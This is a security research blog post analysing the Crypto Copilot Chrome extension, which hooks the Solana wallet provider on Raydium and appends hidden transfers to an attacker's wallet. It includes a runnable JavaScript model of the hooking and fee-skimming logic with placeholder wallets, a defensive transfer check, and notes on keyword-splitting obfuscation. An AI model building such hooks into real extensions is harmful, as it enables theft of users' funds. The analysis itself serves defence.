A few weeks ago on November 19, Casmer Labs published a blog post exploring malicious browser extensions. In the article, we covered how malicious browser extensions manage to get listed in marketplaces as well as a few examples of specific pieces of malicious software. Before reading further, check out the article so you understand how the workflow generally operates.
How It Works
First reported on November 25 by Socket’s Threat Research Team is the Crypto Copilot browser extension, which was listed on the Chrome Store on June 28, 2025. The extension is advertised as a method to quickly execute Solana trades straight from the X (formerly Twitter) interface. As of the publication of this article, the extension is still available for download. The Casmer Labs team, as well as a number of other threat laboratories, have submitted requests for the extension to be de-listed.
Let’s take a look at how the extension works:
- The attack begins when the user navigates to raydium.io. The extension uses the chrome.scripting.executeScript API to inject a JavaScript payload into the main world of the Raydium web application.
- The injected script wraps the global window.solana provider object and hooks its signTransaction and signAndSendTransaction methods.
- When the user executes a swap, the Raydium frontend constructs a VersionedTransaction or Transaction object containing the following instructions:
  - Create Associated Token Account (if needed)
  - The Raydium swap instruction, which is the core logic
  - Close Account (optional)
- The Raydium frontend calls window.solana.signAndSendTransaction(transaction). Because the malware has hooked this method, the call is captured first by the Crypto Copilot extension.
- The malware deserializes the transaction instructions and applies the following logic:
  - If the trade value is below 2.6 SOL (~$330 USD), the stolen amount is a flat 0.0013 SOL
  - If the trade value is above 2.6 SOL, 0.05% of the amount is stolen
- The malware generates a new Solana instruction with the SystemProgram.transfer method, using the following parameters:
  - From: User_Wallet_Address, extracted from the transaction
  - To: Attacker_Wallet_Address
  - Lamports: the calculated fee
- The new instruction is appended to the transaction, which is then re-serialized.
- The user "Approves" the transaction in their wallet, signing the attacker's transfer bundled with the legitimate swap.
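To make the hooking step concrete, the following is an added example written for this article; it is not the Crypto Copilot code and not Raydium's frontend. A plain object stands in for a web3.js Transaction so the example runs offline, the Raydium program id, wallet strings and the `amountIn` field are assumed placeholders, and the fee schedule is the one reported above. It pairs the hook with the check a wallet or dApp could run before signing: flag any System Program transfer whose destination the user does not own.

```javascript
// Added example (not the Crypto Copilot code or Raydium's): a self-contained
// model of the provider hook and fee-skimming logic described above. A plain
// object stands in for a web3.js Transaction so it runs offline; the Raydium
// program id, wallet strings and the 'amountIn' field are assumed placeholders.
// The real extension reaches the page's window.solana by injecting its script
// with chrome.scripting.executeScript({ world: 'MAIN', ... }).

const LAMPORTS_PER_SOL = 1_000_000_000;
const SYSTEM_PROGRAM_ID = '11111111111111111111111111111111'; // Solana System Program
const RAYDIUM_AMM_ID = 'RaydiumSwapProgramPlaceholder'; // assumed placeholder, not the real id

// Fee schedule as reported: flat 0.0013 SOL below 2.6 SOL, 0.05% (5 bps) otherwise.
const THRESHOLD_LAMPORTS = 2_600_000_000;
const FLAT_SKIM_LAMPORTS = 1_300_000;

function skimLamports(tradeLamports) {
  if (tradeLamports < THRESHOLD_LAMPORTS) return FLAT_SKIM_LAMPORTS;
  return Math.floor((tradeLamports * 5) / 10_000);
}

// Stand-in for SystemProgram.transfer({ fromPubkey, toPubkey, lamports }).
function systemTransfer(from, to, lamports) {
  return {
    programId: SYSTEM_PROGRAM_ID,
    accounts: [from, to],
    data: { kind: 'transfer', from, to, lamports },
  };
}

// Stand-in for the three-instruction swap the Raydium frontend builds
// (create ATA, swap, close account). 'amountIn' is the constructed trade size.
function makeSwapTransaction(user, amountInLamports) {
  return {
    feePayer: user,
    instructions: [
      { programId: 'AssociatedTokenProgramPlaceholder', accounts: [user], data: { kind: 'createAta' } },
      { programId: RAYDIUM_AMM_ID, accounts: [user], data: { kind: 'swap', amountIn: amountInLamports } },
      { programId: 'TokenProgramPlaceholder', accounts: [user], data: { kind: 'closeAccount' } },
    ],
  };
}

// The hook: replace the provider's method with a wrapper that appends a
// transfer to the attacker before handing the transaction to the real method.
// The mutation is synchronous, so it is in place before the wallet prompt.
function installSkimHook(provider, attackerWallet) {
  const original = provider.signAndSendTransaction.bind(provider);
  provider.signAndSendTransaction = function hooked(tx, opts) {
    const swap = tx.instructions.find((ix) => ix.programId === RAYDIUM_AMM_ID);
    if (swap) {
      const from = tx.feePayer; // user wallet, read out of the transaction itself
      tx.instructions.push(systemTransfer(from, attackerWallet, skimLamports(swap.data.amountIn)));
    }
    return original(tx, opts);
  };
}

// Defensive check a wallet or dApp can run before signing: any System Program
// transfer whose destination is not one of the user's own addresses is suspect.
function findUnexpectedTransfers(tx, ownAddresses) {
  return tx.instructions.filter(
    (ix) => ix.programId === SYSTEM_PROGRAM_ID && ix.data.kind === 'transfer' && !ownAddresses.has(ix.data.to),
  );
}

// Walk through one hooked 10 SOL swap with constructed wallet addresses.
function demo() {
  const user = 'UserWalletPlaceholder'; // constructed
  const attacker = 'AttackerWalletPlaceholder'; // constructed
  const provider = {
    publicKey: user,
    signAndSendTransaction(tx) {
      return Promise.resolve({ signature: 'constructed-signature', tx });
    },
  };
  installSkimHook(provider, attacker);
  const tx = makeSwapTransaction(user, 10 * LAMPORTS_PER_SOL);
  provider.signAndSendTransaction(tx);
  const flagged = findUnexpectedTransfers(tx, new Set([user]));
  return { instructionCount: tx.instructions.length, flagged };
}

console.log(JSON.stringify(demo(), null, 2));
```

The point of the check is that the skim only works because the wallet displays whatever instruction list it is handed; a wallet that diffs the transaction against what the dApp intended, or simply lists every System Program transfer and its destination, shows the user a fourth instruction paying an address they have never seen.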
Further investigation into the browser extension shows that the malicious code is heavily obfuscated. One technique is splitting keywords such as transfer, SystemProgram, and solana into concatenated fragments like "Sys" + "tem" + "Pro" + "gram", so that generic regex-based keyword searches used in automated scanning never see the assembled string.
Why It Matters and Conclusion
Malicious browser extensions are nothing new, but the Crypto Copilot campaign is proof that attackers' innovation isn't slowing down anytime soon. Google's Manifest V3 (MV3) architecture, which Chrome began enforcing for extensions in June 2024, introduced stricter limits on remotely hosted code. Remotely hosted code had been the most popular way to ship malicious functionality, so many attackers now have to hide it, obfuscated, inside the code they submit, risking detection during the submission and review process. As always, attackers have adapted, and always will adapt, to rules designed to stop or slow them down.